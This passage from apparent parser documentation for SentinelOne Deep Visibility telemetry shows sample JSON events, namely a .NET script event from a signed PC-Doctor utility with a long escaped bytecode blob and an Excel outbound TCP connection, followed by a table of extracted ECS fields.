\u7a0a\\u2802\\u01c7\\u0600\\u2802\\u01c9\\u0600\\u060a\\u266f\\u0001\\u0d0a\\u8b38\\u0000\\u1200\\u2803\\u0127\\u0a00\\u030b\\u0c72\\u0018\\u1770\\u048d\\u0000\\u1301\\u1104\\u1604\\ua207\\u0411\\ua36f\\u0001\\u0706\\u6f03\\u0195\\u0600\\u7203\\u1832\\u7000\\u8d17\\u0004\\u0100\\u0513\\u0511\\u0716\\u11a2\\u6f05\\u01a3\\u0600\\u46de\\u080c\\u6c72\\u0018\\u1770\\u048d\\u0000\\u1301\\u1106\\u1606\\ua207\\u0611\\ubb28\\u0000\\u0806\\u3f28\\u0004\\u2c06\\ufe02\\u031a\\ua272\\u0018\\u1870\\u048d\\u0000\\u1301\\u1107\\u1607\\ua207\\u0711\\u0817\\u11a2\\u6f07\\u01a5\\u0600\\u00de\\u0312\\u2828\\u0001\\u3a0a\\uff69\\uffff\\u0ede\\u0312\\u16fe[\\u1b00\\u036f\\u0000\\ufffd*\\u1c01\\u0000\\u0000I\\u6c23\\u4600\\u0006\\u0100\\u0002\\\"\\uc09e\\u0e00\\u0000\\u0000\\u301b\\u0002r\\u0000E\\u1100\\ue272\\u0018\\u2870\\u009e\\u0600\\u1602\\uca28\\u0001\\u0a06\\u6f06\\u0129\\u0a00\\u2b0d\\u1233\\u2803\\u012a\\u0a00\\u720b\\u1924\\u7000\\u2807\\u0016\\u2b00\\u6f07\\u0520\\u0600\\u18de\\u080c\\u3c72\\u0019\\u2870\\u00b6\\u0600\\u2808\\u043e\\u0600\\u022c\\u1afe\\u00de\\u0312\\u2b28\\u0001\\u2d0a\\ufffd\\u120e\\ufe03\\u5d16\\u0000\\u6f1b\\u0003\\u0a00\\u72dc\\u196e\\u7000\\u9e28\\u0000\\u2a06\\u0000\\u1c01\\u0000\\u0000.\\u3608\\u1800\\u0006\\u0100\\u0002\\u0019\\u5940\\u0e00\\u0000\\u0000\\u301b\\u0002\\u00ba\\u0000F\\u1100\\u8f28\\u0000\\u2d06\\u2a01\\ube72\\u0019\\u2870\\u009e\\u0600\\ufe72\\u0019\\u2870\\u009e\\u0600\\u7b02\\u0094\\u0400\\u196f\\u0001\\u280a\\u0014\\u2b00\\u060a\\u2c6f\\u0001\\u130a\\u2b04\\u1213\\u2804\\u012d\\u0a00\\u720b\\u1a10\\u7000\\u2807\\u0017\\u2b00\\u0412\\u2e28\\u0001\\u2d0a\\ufffd\\u120e\\ufe04\\u5e16\\u0000\\u6f1b\\u0003\\u0a00\\u72dc\\u1a18\\u7000\\u9e28\\u0000\\u0206\\ub028\\u0001\\u2806\\u0018\\u2b00\\u080c\\u2f6f\\u0001\\u130a\\u2b05\\u1213\\u2805\\u0130\\u0a00\\u720d\\u1a10\\u7000\\u2809\\u0019\\u2b00\\u0512\\u3128\\u0001\\u2d0a\\ufffd\\u120e\\ufe05\\u5f16\\u0000\\u6f1b\\u0003\\u0a00\\u72dc\\u1a26\\u7000\\u9e28\\u0000\\u2a06\\u0000\\u1c01\\u0000\\
\u7370\\u0c55\\u0600\\u087a\\u856f\\u000f\\u2d06\\u08de\\u6f03\\u0f86\\u0600\\u0307\\u806f\\f\\u6f06\\u0c81\\u0600\\u0303\\u806f\\f\\u7206\\u1dfd\\u7000\\u9928\\u0000\\u6f0a\\u0c81\\u0600\\u3372.\\u0770\\u806f\\f\\u0706\\ua56f\\u0000\\u6f0a\\u00a6\\u0a00\\u6f03\\u0c80\\u0600\\u3228\\u0000\\u072b*\\u0000\\u3013\\u0003C\\u0000&\\u1100\\u1ed0\\u0001\\u2802~\\u0a00\\u6f04\\u01b6\\u0a00\\u022d\\u2a14\\u7203\\u2768\\u7000\\u6f14\\u020b\\u0600\\u3028\\u0002\\u0a06\\u2d06\\u1402\\u022a\\u1728\\u0002\\u6f06\\u0168\\u0600\\u0602\\u4c28\\u0002\\u6f06\\u01b7\\u0a00*\\u301b\\u0004i\\u0000u\\u1100\\u0a03\\u2802\\u01ad\\u0600\\u3328\\u0000\\u0b2b\\u6f07\\u01b8\\u0a00\\u0413\\u362b\\u0412\\ub928\\u0001\\u0c0a\\u0212\\u3f28\\u0001\\u0d0a\\u2c09\\u0623\\u9f72.\\u1270\\u2802\\u013e\\u0a00\\ua572.\\u2870\\u009d\\u0a00\\u6f09\\u08c1\\u0600\\ub76f\\u0000\\u0a0a\\u0412\\uba28\\u0001\\u2d0a\\ufffd\\u120e\\ufe04\\u8a16\\u0000\\u6f1b\\u0003\\u0a00\\u06dc*\\u0000\\u1001\\u0000\\u0002\\u0016\\u5943\\u0e00\\u0000\\u0000\\u023a\\u2728\\u0000\\u020a\\u2816\\u0255\\u0600\\u1e2a\\u7b02\\u00c4\\u0400\\u222a\\u0302\\uc47d\\u0000\\u2a04\\u0222\\u6f03\\u0257\\u0600\\u1e2a\\u7b02\\u00c6\\u0400\\u222a\\u0302\\uc67d\\u0000\\u2a04\\u0000\\u3013\\u0002#\\u0000]\\u1100\\u2802\\u0258\\u0600\\u6f03\\u00cf\\u0600\\u7e0a\\u00c5\\u0400\\u6f06\\u0093\\u0a00\\u072c\\u2802\\u0254\\u0600\\u162a\\u322a\\u8c17\\u00cc\\u0100\\uc580\\u0000\\u2a04\\u021e\\u5328\\u0002\\u2a06\\u0222\\u2803\\u00f2\\u0600\\u1e2a\\u2802\\u0253\\u0600\\u1e2a\\u7b02\\u00cd\\u0400\\u222a\\u0302\\ucd7d\\u0000\\u2a04\\u021e\\uce7b\\u0000\\u2a04\\u0222\\u7d03\\u00ce\\u0400\\u1e2a\\u7b02\\u00cf\\u0400\\u222a\\u0302\\ucf7d\\u0000\\u2a04\\u3013\\u00031\\u0000v\\u1100\\u2802\\u0261\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0206\\u6328\\u0002\\u0606\\u956f\\u0000\\u160a\\u0732\\u2802\\u0254\\u0600\\u162a\\u1e2a\\u2802\\u025e\\u0600\\u1e2a\\u7b02\\u00d0\\u0400\\u222a\\u0302\\ud07d\\u0000\\u2a04\\u021e\\ud17b\\u0000\\u2a04\\u0222
\\u7d03\\u00d1\\u0400*\\u3013\\u00030\\u0000v\\u1100\\u2802\\u0267\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0206\\u6928\\u0002\\u0606\\u946f\\u0000\\u2c0a\\u0207\\u5428\\u0002\\u2a06\\u2a16\\u021e\\u5e28\\u0002\\u2a06\\u021e\\ud27b\\u0000\\u2a04\\u0222\\u7d03\\u00d2\\u0400\\u1e2a\\u7b02\\u00d3\\u0400\\u222a\\u0302\\ud37d\\u0000\\u2a04\\u0000\\u3013\\u00033\\u0000w\\u1100\\u2802\\u026f\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0b06\\u0207\\u6d28\\u0002\\u0606\\u956f\\u0000\\u160a\\u072f\\u2802\\u0254\\u0600\\u162a\\u1e2a\\u2802\\u025e\\u0600\\u1e2a\\u2802\\u025e\\u0600\\u1e2a\\u7b02\\u00d4\\u0400\\u222a\\u0302\\ud47d\\u0000\\u2a04\\u021e\\ud57b\\u0000\\u2a04\\u0222\\u7d03\\u00d5\\u0400*\\u0000\\u3013\\u00030\\u0000v\\u1100\\u2802\\u0276\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0206\\u7428\\u0002\\u0606\\u946f\\u0000\\u2d0a\\u0207\\u5428\\u0002\\u2a06\\u2a16\\u0222\\u2803\\u0280\\u0600\\u322a\\uf57e\\u0002\\u0204\\u8028\\u0002\\u2a06\\u7e32\\u02f6\\u0400\\u2802\\u0280\\u0600\\u322a\\uf77e\\u0002\\u0204\\u8028\\u0002\\u2a06\\u7e32\\u02f8\\u0400\\u2802\\u0280\\u0600\\u322a\\uf97e\\u0002\\u0204\\u8028\\u0002\\u2a06\\u7e32\\u02fa\\u0400\\u2802\\u0280\\u0600*\\u3013\\u0003@\\u0000x\\u1100\\u2503\\u062d\\u7e26[\\u0a00\\ubc28\\u0001\\u0a0a\\u2806\\u01bd\\u0a00\\u082d\\u2806\\u0b48\\u0600\\u052b\\ud67e\\u0000\\u0b04\\u0207\\u8373\\u0002\\u0c06\\u2c03\\u080d\\ua972.\\u0370\\u8f6f\\u0002\\u2606\\u2a08\\u282e\\u0b43\\u0600\\ud680\\u0000\\u2a04\\u0236\\u7e03\\u02f6\\u0400\\u8328\\u0002\\u2a06\\u0000\\u3013\\u0003`\\u0000y\\u1100\\u2802'\\u0a00\\u2d03\\u720b\\u065b\\u7000\\u2073\\u0001\\u7a0a\\u1404\\u2328\\u000b\\u2c06\\u720b\\u2ec7\\u7000\\u2073\\u0001\\u7a0a\\u0302\\ufffd\\u0204\\ud473\\b\\u0a06\\u0406\\ufffd\\b\\u0606\\u6f03\\u02b0\\u0600\\ue76f\\b\\u0606\\u3328\\u0010\\u6f06\\u1032\\u0600\\ufffd\\u0606\\ud77d\\u0000\\u2a04\\u021e\\ud77b\\u0000\\u2a04\\u023a\\ud77b\\u0000\\u0304\\ue56f\\b\\u0206\\u
8a2a\\u1403\\u2328\\u000b\\u2c06\\u720b\\u2ec7\\u7000\\u2073\\u0001\\u7a0a\\u7b02\\u00d7\\u0400\\u6f03\\u08dd\\u0600\\u2a02\\u023a\\ud77b\\u0000\\u0304\\ue76f\\b\\u0206\\u3a2a\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u2a02\\u3013\\u0004%\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d17\\u0004\\u0100\\u060a\\u0416\\u06a2\\uec6f\\b\\u0206*\\u0000\\u3013\\u0004)\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d18\\u0004\\u0100\\u060a\\u0416\\u06a2\\u0517\\u06a2\\uec6f\\b\\u0206*\\u0000\\u3013\\u0004.\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d19\\u0004\\u0100\\u060a\\u0416\\u06a2\\u0517\\u06a2\\u0e18\\ua204\\u6f06\\u08ec\\u0600\\u2a02\\u0000\\u3013\\u00043\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d1a\\u0004\\u0100\\u060a\\u0416\\u06a2\\u0517\\u06a2\\u0e18\\ua204\\u1906\\u050e\\u06a2\\uec6f\\b\\u0206\\u6a2a\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u6f04\\u08ec\\u0600\\u2a02\\u029a\\ud77b\\u0000\\u0304\\uee6f\\b\\u0206\\ud77b\\u0000\\u0404\\uea6f\\b\\u0206\\ud77b\\u0000\\u0504\\uec6f\\b\\u0206\\u8a2a\\u2d03\\u720b\\u16ae\\u7000\\u2073\\u0001\\u7a0a\\u7b02\\u00d7\\u0400\\uf16f\\b\\u0306\\u6f04\\u01be\\u0a00\\u2a02\\u301b\\u0004X\\u0000z\\u1100\\u2d03\\u720b\\u2ed9\\u7000\\u2073\\u0001\\u7a0a\\u6f03\\u01bf\\u0a00\\u026f\\u0000\\u0b0a\\u1f2b\\u6f07\\u0005\\u0a00\\u020a\\ud77b\\u0000\\u6f04\\u08f1\\u0600\\u0306\\u6f06\\u01c0\\u0a00\\ube6f\\u0001\\u070a\\u2a6f\\u0000\\u2d0a\\ufffd\\u0711\\u0a75\\u0000\\u0c01\\u2c08\\u0806\\u036f\\u0000\\ufffd\\u2a02\\u1001\\u0000\\u0002\\u001a\\u452b\\u1100\\u0000\\u0000\\u023a\\ud77b\\u0000\\u0304\\ufffd\\u0206\\u3e2a\\u7b02\\u00d7\\u0400\\u0403\\ufc6f\\b\\u0206*\\u3003\\u0003G\\u0000\\u0000\\u0000\\u2c03\\u020d\\uef72.\\u0370\\u8f28\\u0002\\u2606\\u2c04\\u020d\\ua972.\\u0470\\u8f28\\u0002\\u2606\\u2c05\\u0212\\u1172/\\u0570\\ud08c\\u0000\\u2801\\u
028f\\u0600\\u0226\\ufffd\\u0204\\ud77b\\u0000\\u6f04\\u02b3\\u0600*\\u3003\\u0003U\\u0000\\u0000\\u0000\\u2c03\\u0308\\uc16f\\u0001\\u2d0a\\u2a01\\u2c04\\u020d\\uef72.\\u0470\\u8f28\\u0002\\u2606\\u2c05\\u020d\\ua972.\\u0570\\u8f28\\u0002\\u2606\\u040e\\u132c\\u7202\\u2f11\\u7000\\u040e\\ud08c\\u0000\\u2801\\u028f\\u0600\\u0226\\ufffd\\u0204\\ud77b\\u0000\\u6f04\\u02b3\\u0600*\\u0000\\u3003\\u0003M\\u0000\\u0000\\u0000\\u2d03\\u2a01\\u2c04\\u020d\\uef72.\\u0470\\u8f28\\u0002\\u2606\\u2c05\\u020d\\ua972.\\u0570\\u8f28\\u0002\\u2606\\u040e\\u132c\\u7202\\u2f11\\u7000\\u040e\\ud08c\\u0000\\u2801\\u028f\\u0600\\u0226\\ufffd\\u0204\\ud77b\\u0000\\u6f04\\u02b3\\u0600*\\u0000\\u3013\\u0002\\n\\u0000{\\u1100\\u0302\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f5\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f6\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f7\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f8\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f9\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02fa\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0222\\u2803\\u02a4\"}", - "event": { - "action": "scripts", - "start": "2021-09-16T14:22:42.798000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFQFVBJWAT35E5D075MQ1408", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "scripts" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 1, - "file_creation": 3, - "file_deletion": 3, - "file_modification": 33, - "module_load": 224, - "net_conn_out": 3, - "registry_modification": 1 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": 
"E_FALSE", - "name": "C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe", - "node": { - "key": "FBFFF74AA755328C" - }, - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC." - } - }, - "size_bytes": "5518152", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_TRUE", - "node": { - "key": "35A565744E7A266A" - }, - "parent": { - "counters": { - "cross_process": 2, - "cross_process_dup_process_handle": 2, - "file_creation": 1, - "file_deletion": 1, - "file_modification": 32, - "model_child_process": 1, - "module_load": 237, - "net_conn_out": 2, - "os_child_process": 1, - "registry_modification": 3 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe", - "node": { - "key": "DED9F9357E5C5C30" - }, - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC." 
- } - }, - "size_bytes": "5518152", - "start": "1631802160011" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_TRUE", - "node": { - "key": "04DEDAAF23E16398" - }, - "parent": { - "node": { - "key": "EDA8D6AB348AAE7D" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B21DD2505AAA5F2" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B21DD2505AAA5F2" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "script": { - "app_name": "DotNet" - } - }, - "file": { - "size": 612864 - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe\" /child", - "executable": "C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe", - "hash": { - "md5": "423050654da76dab9c2866ba3c13ce38", - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa" - }, - "name": "CSAW_Child.exe", - "parent": { - "command_line": "\"C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe\" /NA /noui", - "hash": { - "md5": "423050654da76dab9c2866ba3c13ce38", - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa" - }, - "name": "csaw.exe", - "pid": 1780, - "working_directory": "C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries" - }, - "pid": 14832, - "start": "2021-09-16T14:22:42.671000Z", - "working_directory": "C:\\ProgramData\\PCDr\\CSAW" - }, - "related": { - "hash": [ - "423050654da76dab9c2866ba3c13ce38", - "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - 
"e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "tcpv4.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 51, \"uuid\": \"19f22913365942f2afeed1463c96104b\", \"traceId\": \"620565A45ABA475FB419254BE2152CA4\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM11\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631630518385\"}, \"event_type\": \"tcpv4\", \"trueContext\": {\"key\": {\"value\": \"C5307F702A45841C\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"CE27A4E72749E6F2\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"88D134761AF47342\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"64262984\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT CORPORATION\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"c20704e15fa16fd333cf61c5611dc74299284d7d\", \"sha256\": \"02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4\", \"md5\": \"3dcef51688df91a37bc07d8a261a9427\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE\\\" /vu \\\"C:\\\\Users\\\\l.maoui\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\GMYOE03V\\\\S36 -2021.xlsx\\\"\", \"fullPid\": {\"pid\": 19376, \"startTime\": {\"millisecondsSinceEpoch\": \"1631603628039\"}}, \"user\": {\"name\": \"CORP\\\\l.maoui\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6168\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": 
{\"key\": {\"value\": \"9C0BFCE246E832C2\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Microsoft Excel\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 10, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"C5307F702A45841C\"}}, \"counters\": {\"moduleLoad\": 1775, \"fileCreation\": 136, \"fileDeletion\": 63, \"fileModification\": 436, \"netConnOut\": 261, \"registryModification\": 7653, \"dnsLookups\": 108}}, \"sourceAddress\": {\"address\": \"10.26.8.27\", \"port\": 50965}, \"destinationAddress\": {\"address\": \"52.182.143.208\", \"port\": 443}, \"direction\": \"OUTGOING\", \"status\": \"SUCCESS\"}", - "event": { - "action": "tcpv4", - "start": "2021-09-14T14:41:58.385000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 51, - "trace_id": "620565A45ABA475FB419254BE2152CA4", - "uuid": "19f22913365942f2afeed1463c96104b" - }, - "event": { - "type": "tcpv4" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 108, - "file_creation": 136, - "file_deletion": 63, - "file_modification": 436, - "module_load": 1775, - "net_conn_out": 261, - "registry_modification": 7653 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", - "node": { - "key": "88D134761AF47342" - }, - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION" - } - }, - "size_bytes": "64262984", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "CE27A4E72749E6F2" - }, - "parent": { - "node": { - "key": "9C0BFCE246E832C2" - } - }, 
- "root": "E_TRUE", - "session_id": 10, - "true_context": { - "key": "C5307F702A45841C" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - } - }, - "true_context": { - "key": "C5307F702A45841C" - } - }, - "destination": { - "address": "52.182.143.208", - "ip": "52.182.143.208", - "port": 443 - }, - "host": { - "name": "LAPTOP-COM11", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "network": { - "direction": "outbound" - }, - "process": { - "command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" /vu \"C:\\Users\\l.maoui\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\GMYOE03V\\S36 -2021.xlsx\"", - "executable": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", - "hash": { - "md5": "3dcef51688df91a37bc07d8a261a9427", - "sha1": "c20704e15fa16fd333cf61c5611dc74299284d7d", - "sha256": "02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4" - }, - "name": "EXCEL.EXE", - "pid": 19376, - "start": "2021-09-14T07:13:48.039000Z", - "title": "Microsoft Excel", - "working_directory": "C:\\Program Files\\Microsoft Office\\root\\Office16" - }, - "related": { - "hash": [ - "02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4", - "3dcef51688df91a37bc07d8a261a9427", - "c20704e15fa16fd333cf61c5611dc74299284d7d" - ], - "ip": [ - "10.26.8.27", - "52.182.143.208" - ], - "user": [ - "CORP\\l.maoui" - ] - }, - "source": { - "address": "10.26.8.27", - "ip": "10.26.8.27", - "port": 50965 - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6168", - "name": "CORP\\l.maoui" - } - } - - ``` - - - - - -### Extracted Fields - -The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. 
- -| Name | Type | Description | -| ---- | ---- | ---------------------------| -|`agent.version` | `keyword` | Version of the agent. | -|`deepvisibility.agent.managment_url` | `keyword` | | -|`deepvisibility.agent.seq_id` | `long` | | -|`deepvisibility.agent.trace_id` | `keyword` | | -|`deepvisibility.agent.uuid` | `keyword` | | -|`deepvisibility.dns.answers.results` | `keyword` | | -|`deepvisibility.event.type` | `keyword` | | -|`deepvisibility.file.is_kernel_module` | `boolean` | Whether or not the file is part of the kernel | -|`deepvisibility.file.location` | `keyword` | | -|`deepvisibility.file.node.key` | `keyword` | | -|`deepvisibility.host.os.revision` | `keyword` | | -|`deepvisibility.indicator.category` | `keyword` | | -|`deepvisibility.indicator.classification` | `keyword` | | -|`deepvisibility.indicator.description` | `keyword` | | -|`deepvisibility.indicator.id` | `keyword` | | -|`deepvisibility.indicator.long_description` | `keyword` | | -|`deepvisibility.indicator.metadata` | `keyword` | | -|`deepvisibility.indicator.name` | `keyword` | | -|`deepvisibility.indicator.tactics` | `object` | | -|`deepvisibility.process.counters.cross_process` | `long` | | -|`deepvisibility.process.counters.cross_process_dup_process_handle` | `long` | | -|`deepvisibility.process.counters.cross_process_dup_thread_handle` | `long` | | -|`deepvisibility.process.counters.dns_lookups` | `long` | | -|`deepvisibility.process.counters.file_creation` | `long` | | -|`deepvisibility.process.counters.file_deletion` | `long` | | -|`deepvisibility.process.counters.file_modification` | `long` | | -|`deepvisibility.process.counters.model_child_process` | `long` | | -|`deepvisibility.process.counters.module_load` | `long` | | -|`deepvisibility.process.counters.net_conn_out` | `long` | | -|`deepvisibility.process.counters.os_child_process` | `long` | | -|`deepvisibility.process.counters.registry_modification` | `long` | | -|`deepvisibility.process.desired_access` | `long` | Process desired 
access | -|`deepvisibility.process.excluded` | `keyword` | | -|`deepvisibility.process.executable.is_dir` | `keyword` | | -|`deepvisibility.process.executable.name` | `keyword` | | -|`deepvisibility.process.executable.node.key` | `keyword` | | -|`deepvisibility.process.executable.signature.signed.identity` | `keyword` | | -|`deepvisibility.process.executable.size_bytes` | `keyword` | | -|`deepvisibility.process.executable.start` | `keyword` | | -|`deepvisibility.process.family` | `keyword` | | -|`deepvisibility.process.integrity_level` | `keyword` | | -|`deepvisibility.process.interactive` | `keyword` | | -|`deepvisibility.process.is_redirected_command_processor` | `keyword` | | -|`deepvisibility.process.is_wow64` | `keyword` | | -|`deepvisibility.process.node.key` | `keyword` | | -|`deepvisibility.process.parent.counters.cross_process` | `long` | | -|`deepvisibility.process.parent.counters.cross_process_dup_process_handle` | `long` | | -|`deepvisibility.process.parent.counters.cross_process_dup_thread_handle` | `long` | | -|`deepvisibility.process.parent.counters.dns_lookups` | `long` | | -|`deepvisibility.process.parent.counters.file_creation` | `long` | | -|`deepvisibility.process.parent.counters.file_deletion` | `long` | | -|`deepvisibility.process.parent.counters.file_modification` | `long` | | -|`deepvisibility.process.parent.counters.model_child_process` | `long` | | -|`deepvisibility.process.parent.counters.module_load` | `long` | | -|`deepvisibility.process.parent.counters.net_conn_out` | `long` | | -|`deepvisibility.process.parent.counters.os_child_process` | `long` | | -|`deepvisibility.process.parent.counters.registry_modification` | `long` | | -|`deepvisibility.process.parent.excluded` | `keyword` | | -|`deepvisibility.process.parent.executable.is_dir` | `keyword` | | -|`deepvisibility.process.parent.executable.name` | `keyword` | | -|`deepvisibility.process.parent.executable.node.key` | `keyword` | | 
-|`deepvisibility.process.parent.executable.signature.signed.identity` | `keyword` | | -|`deepvisibility.process.parent.executable.size_bytes` | `keyword` | | -|`deepvisibility.process.parent.executable.start` | `keyword` | | -|`deepvisibility.process.parent.family` | `keyword` | | -|`deepvisibility.process.parent.integrity_level` | `keyword` | | -|`deepvisibility.process.parent.interactive` | `keyword` | | -|`deepvisibility.process.parent.is_redirected_command_processor` | `keyword` | | -|`deepvisibility.process.parent.is_wow64` | `keyword` | | -|`deepvisibility.process.parent.node.key` | `keyword` | | -|`deepvisibility.process.parent.parent.node.key` | `keyword` | | -|`deepvisibility.process.parent.root` | `keyword` | | -|`deepvisibility.process.parent.session_id` | `long` | | -|`deepvisibility.process.parent.true_context.key` | `keyword` | | -|`deepvisibility.process.parent.user.sid` | `keyword` | | -|`deepvisibility.process.relations` | `keyword` | Relations between source and target | -|`deepvisibility.process.root` | `keyword` | | -|`deepvisibility.process.session_id` | `long` | | -|`deepvisibility.process.target.command_line` | `keyword` | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. 
| -|`deepvisibility.process.target.counters.cross_process` | `long` | | -|`deepvisibility.process.target.counters.cross_process_dup_process_handle` | `long` | | -|`deepvisibility.process.target.counters.cross_process_dup_thread_handle` | `long` | | -|`deepvisibility.process.target.counters.dns_lookups` | `long` | | -|`deepvisibility.process.target.counters.file_creation` | `long` | | -|`deepvisibility.process.target.counters.file_deletion` | `long` | | -|`deepvisibility.process.target.counters.file_modification` | `long` | | -|`deepvisibility.process.target.counters.model_child_process` | `long` | | -|`deepvisibility.process.target.counters.module_load` | `long` | | -|`deepvisibility.process.target.counters.net_conn_out` | `long` | | -|`deepvisibility.process.target.counters.os_child_process` | 